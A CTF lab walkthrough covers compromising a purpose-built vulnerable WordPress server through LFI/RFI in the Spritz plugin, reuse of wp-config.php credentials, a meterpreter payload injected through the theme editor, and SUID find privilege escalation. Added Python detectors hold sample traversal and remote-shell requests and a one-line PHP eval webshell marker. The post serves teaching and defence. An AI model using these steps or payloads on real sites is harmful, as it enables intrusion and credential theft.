WordPress CTF walkthrough

A while back I hosted a “hacking and pizza” event at school. There was a large variety of vulnerable hosts. One of the machines I created was a web server with a vulnerable WordPress plugin. In this post, a walkthrough of the solution is provided, as it is common to encounter WordPress installations either during a CTF scenario or a penetration test. Many of the same vulnerabilities are often found in WordPress plugins, such as Local File Inclusion (LFI) and Remote File Inclusion (RFI). Achieving a reverse shell by misusing the admin panel is a common technique as well. Therefore, understanding the tools and tricks used to compromise a WordPress installation is essential.

Nmap reveals that there are numerous services running. SSH has been changed to a different port than default – just for fun. When targeting the web server with nikto, dirbuster, or gobuster – the WordPress installation is revealed at http://192.168.0.73/wordpress/. The next step is to use wpscan, which can enumerate plugins, themes, usernames, passwords, etc.

Wpscan shows a series of vulnerabilities, which are mostly linked to XSS. However, wpscan does not list Spritz version 1.0 as vulnerable. (And yes, I will contact wpscan.org and let them know). However, a quick Google search indicates that the plugin is vulnerable to both LFI and RFI. The necessary information is provided in the Exploit Database. The file wp.spritz.content.filter.php contains vulnerable code.

Exploiting the vulnerability lets the attacker read internal system files. /etc/passwd displays two users: Ajax and Kieren. A common file of interest when attacking any CMS installation is the configuration file. These can often contain usernames and passwords.

Reading the wp-config.php file reveals the database username and password. As users often reuse their credentials – could the password work for either Ajax or Kieren?

The same plugin file is also vulnerable to RFI. The image above confirms that it is possible to include a remotely hosted reverse shell on the targeted system. Achieving a reverse shell using this method is slightly easier than getting a reverse shell with LFI. Read my previous article regarding LFI to Meterpreter for further information. However, the main focus of this article is to exploit the tools embedded in WordPress itself, and not only an RFI vulnerability.
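From the defender's side, both the LFI and the RFI requests described above leave a clear trace in the web server's access log. The following detector is an added example and is not code from the original post: it parses Apache combined-format log lines, decodes every query parameter, and flags values that contain directory traversal or a well-known sensitive file (LFI) or that name a remote URL or stream wrapper (RFI). The log lines are constructed for this example; only the file name wp.spritz.content.filter.php comes from the walkthrough, the plugin directory name and the `url` parameter name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache "combined" access-log lines for this example; none are taken
# from the original post. The plugin directory and the "url" parameter name are
# assumed; only the file name wp.spritz.content.filter.php comes from the walkthrough.
SAMPLE_LOG = """\
192.168.0.50 - - [10/Mar/2020:14:02:11 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Mar/2020:14:03:45 +0000] "GET /wordpress/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../../etc/passwd HTTP/1.1" 200 1794 "-" "curl/7.68.0"
192.168.0.50 - - [10/Mar/2020:14:04:02 +0000] "GET /wordpress/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 2201 "-" "curl/7.68.0"
192.168.0.50 - - [10/Mar/2020:14:05:19 +0000] "GET /wordpress/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://192.168.0.50/shell.txt HTTP/1.1" 200 88 "-" "curl/7.68.0"
192.168.0.51 - - [10/Mar/2020:14:06:00 +0000] "GET /wordpress/?s=hello+world HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A value that names a remote resource or a PHP stream wrapper (http://, ftp://,
# php://, data:) is reported as RFI; wrappers are included on purpose.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*://|data:)", re.IGNORECASE)
# Directory traversal or a well-known sensitive file is reported as LFI.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "wp-config.php", "/proc/self/environ")


def classify_value(value):
    """Return 'rfi', 'lfi' or None for a single query-parameter value."""
    # parse_qsl already decoded once; decode again to catch double encoding (%252e).
    decoded = unquote(value)
    if REMOTE_RE.match(decoded):
        return "rfi"
    if TRAVERSAL_RE.search(decoded) or any(s in decoded for s in SENSITIVE_FILES):
        return "lfi"
    return None


def analyze_log(text):
    """Scan access-log text and return one finding per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "param": name,
                    "value": unquote(value),
                    "kind": kind,
                    "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['kind'].upper():3} {f['ip']} {f['path']} {f['param']}={f['value']!r} -> {f['status']}")
```

The response status is kept in each finding because a 200 on a traversal request, as in the sample, is the difference between a probe and a successful read; a 404 or 403 on the same path still deserves a look but is a much weaker signal.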

The password retrieved from the wp-config.php file worked for the user “ajax”, and we now have full access to the administration panel. There are a few ways to achieve a reverse shell. A personal favourite is to enter the Editor section under the Appearance tab and inject the reverse-shell PHP payload. The content of the previously generated meterpreter.php payload is added to the comments.php file. This method can be used on most WordPress installations.

Metasploit’s exploit/handler caught the reverse shell after visiting http://192.168.0.73/wordpress/wp-content/themes/twentysixteen/comments.php. The next step is privilege escalation.
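The theme-editor technique above works because a theme file on disk changed and nothing noticed. The following integrity check is an added example, not code from the original post or from WordPress: it takes a SHA-256 baseline of a theme directory while the theme is trusted, later reports added, modified and removed files, and scans the changed ones for PHP indicators (code execution, decoding/obfuscation and socket functions). The theme tree, the file contents and the injected marker in `demo()` are all constructed for this example; the pattern lists are a starting point, not a complete rule set.

```python
import hashlib
import os
import re
import tempfile

# Indicator patterns for this example; a production baseline would be tuned to the theme.
SUSPICIOUS_PATTERNS = {
    "code-exec": re.compile(rb"\b(?:eval|system|shell_exec|passthru|exec|proc_open|popen)\s*\("),
    "obfuscation": re.compile(rb"\b(?:base64_decode|gzinflate|str_rot13)\s*\("),
    "network": re.compile(rb"\b(?:fsockopen|stream_socket_client)\s*\("),
}


def hash_tree(root):
    """Map each file under root (relative path) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def scan_file(path):
    """Return the names of indicator patterns that match the file's bytes."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(data))


def audit_theme(root, baseline):
    """Compare the theme directory against a trusted baseline of digests.

    Returns {"added": [...], "modified": [...], "removed": [...], "indicators": {path: [...]}}.
    Only added or modified files are pattern-scanned; unchanged files match the baseline.
    """
    current = hash_tree(root)
    report = {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "removed": sorted(p for p in baseline if p not in current),
        "indicators": {},
    }
    for rel in report["added"] + report["modified"]:
        hits = scan_file(os.path.join(root, rel))
        if hits:
            report["indicators"][rel] = hits
    return report


def demo():
    """Build a constructed theme tree, take a baseline, then tamper with comments.php."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "twentysixteen")
        os.makedirs(theme)
        files = {  # constructed stand-ins, not the real theme files
            "style.css": b"/* Theme Name: Twenty Sixteen (constructed copy) */\n",
            "functions.php": b"<?php\nadd_theme_support('title-tag');\n",
            "comments.php": b"<?php\nif (post_password_required()) { return; }\n",
        }
        for name, body in files.items():
            with open(os.path.join(theme, name), "wb") as fh:
                fh.write(body)
        baseline = hash_tree(theme)  # captured while the theme is still trusted

        # Simulated tampering through the editor: a constructed marker, not a working payload.
        with open(os.path.join(theme, "comments.php"), "ab") as fh:
            fh.write(b"<?php @eval(base64_decode($_REQUEST['p'])); ?>\n")
        return audit_theme(theme, baseline)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is stored outside the web root (or is simply the digest list of the pristine theme package) and the audit runs from cron or a file-integrity monitor; a modified comments.php that suddenly matches `code-exec` and `obfuscation` is exactly the event the walkthrough's editor injection produces.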

The Linux privilege escalation script LinEnum is uploaded to the targeted system. If the attacker does not have a Meterpreter shell, netcat or wget can be used to transfer the script instead. There are many other Linux privilege escalation scripts available if necessary, such as linPEAS.

The script reveals that the find binary has the SUID bit set. The SUID bit lets a regular user execute the binary with the privileges of its owner, here root, without otherwise holding those permissions. find is listed on GTFOBins, which documents binaries that can be used to escalate privileges. find has an -exec option that runs a command for each matched file; as find itself runs as root, every command it executes also runs as root.

Executing the command whoami when using find confirms that it runs as root. However, running find . -exec /bin/sh -p \; -quit gives us a fully interactive root shell. Game over!
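The escalation above only works because a SUID bit was set where it should not be, which is something the system owner can enumerate as easily as the attacker's script did. The following audit is an added example and not code from the original post, LinEnum or GTFOBins: `classify()` decides for one file, from its mode and owner, whether it is SUID and whether its name is on a short list of known GTFOBins escalation binaries (find included) or on a list of SUID binaries a stock system legitimately ships; `scan_suid()` walks the filesystem the way `find / -perm -4000` would. Both name lists are illustrative subsets chosen for this example, not complete references.

```python
import os
import stat

# Short example list; GTFOBins (gtfobins.github.io) is the reference for the full set.
KNOWN_ESCALATORS = {"find", "bash", "sh", "env", "python", "python3", "perl", "vim", "nmap", "less", "more"}
# SUID binaries a stock Linux system needs; still worth reviewing, but not a surprise.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "newgrp", "gpasswd", "pkexec"}

_ORDER = {"high": 0, "review": 1, "expected": 2}


def classify(path, mode, uid):
    """Classify one file from its path, st_mode and owner uid.

    Returns None when the file is not a regular SUID file, otherwise a dict with a risk level:
      'high'     - root-owned and a known GTFOBins escalation binary (e.g. find)
      'expected' - root-owned and on the normal system SUID list
      'review'   - any other SUID file, including ones not owned by root
    """
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None
    name = os.path.basename(path)
    if uid == 0 and name in KNOWN_ESCALATORS:
        risk = "high"
    elif uid == 0 and name in EXPECTED_SUID:
        risk = "expected"
    else:
        risk = "review"
    return {"path": path, "owner_uid": uid, "mode": oct(stat.S_IMODE(mode)), "risk": risk}


def scan_suid(roots=("/usr", "/bin", "/sbin", "/opt")):
    """Walk the given roots (like find / -perm -4000) and classify every SUID file."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)  # lstat: never follow symlinks
                except OSError:
                    continue  # unreadable or vanished entry; skip it
                hit = classify(full, st.st_mode, st.st_uid)
                if hit:
                    findings.append(hit)
    return sorted(findings, key=lambda f: (_ORDER[f["risk"]], f["path"]))


if __name__ == "__main__":
    for f in scan_suid():
        print(f"{f['risk']:8} {f['mode']} uid={f['owner_uid']} {f['path']}")
```

Anything reported as `high` is the finding LinEnum surfaced in the walkthrough; the fix is `chmod u-s` on the binary (or, where the capability is genuinely needed, a narrowly scoped sudoers rule instead of SUID), and the audit is cheap enough to run on a schedule and diff against the previous result.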

Conclusion

This is one of many examples of vulnerable WordPress plugins. Even though wpscan did not mark the plugin as vulnerable, a simple Google search confirms the opposite. Not all penetration testing tools are accurate, so a manual lookup has to be conducted once in a while. A simple LFI vulnerability allows an attacker to read the WordPress configuration file. If the user re-uses his/her credentials, an attacker could gain access to the admin panel. From there on, the Editor allows an attacker to inject malicious PHP code. This will work for most WordPress installations.

Furthermore, there are many different privilege escalation scripts available to an attacker. Most of them identify the SUID binaries located on the system. A SUID binary such as find can then be used to escalate privileges.